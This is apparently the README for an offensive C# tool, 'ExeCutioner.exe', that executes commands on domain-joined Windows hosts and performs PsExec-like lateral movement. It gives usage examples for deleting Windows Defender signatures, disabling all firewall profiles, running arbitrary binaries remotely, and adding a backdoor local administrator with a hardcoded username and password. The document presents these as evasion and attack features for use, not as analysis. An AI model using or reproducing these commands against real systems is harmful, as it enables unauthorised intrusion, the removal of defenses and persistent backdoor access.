

This is an Offensive C# Tool written to execute commands on Domain-joined Windows hosts by either taking user supplied creds (username/password) or leveraging the logged-on user's access token.

It also supports a "PsExeclike" lateral movement technique that attempts to fly under the radar of basic defenses and can be used to clear AV Definitions to further make attacks easier.

ExeCutioner.exe /t <target> /user <username>  /pass <password>  /domain <domain> <command-to-run>


/addadmin - adds a local administrator called newguy with password MakeLife123 to target
/cmd - allows for the execution of commands on the target
/domain - allows for the specification of target domain
/noav - deletes Windows Defender's signatures
/nofw - disables all target firewall profiles
/pass - specifies password to use
/t - specifies the target
/syscreds - ignores the user specified and uses the token of the currently logged in user
/user - specifies the target user account


ExeCutioner.exe /t <target> /user <username>  /pass <password>  /domain <domain> <command-to-run>

Usage: Examples:
ExeCutioner.exe /?  - show's this help menu 

//Authenticate to target with username and password and disable firewall profiles
ExeCutioner.exe /t <target name or IP> /user <username> /pass <password> /domain <domain> /nofw true

//Authenticate to target with current system token and remove Windows Defender Signature Definitions) - useful and facilitates easier lateral movement/code execution
ExeCutioner.exe /t <target name or IP> /syscreds true /noav true

//Authenticate to target with current user token and execute command
ExeCutioner.exe /t <target name or IP> /syscreds /cmd <command-to-run-in-qoutes>

//Authenticate to target with current user token and execute binary for lateral movement. Works when with binaries on disk.
ExeCutioner.exe /t <target name or IP> /syscreds /cmd <C:\lateralmovement.exe>

//Authenticate to target with current user token and add a new Local Administrator - username "newguy" with password "MakeLife123"
ExeCutioner.exe /t <target name or IP> /syscreds /addadmin true

YouTube Video

Below is a link to see the tool in action on my YouTube channel

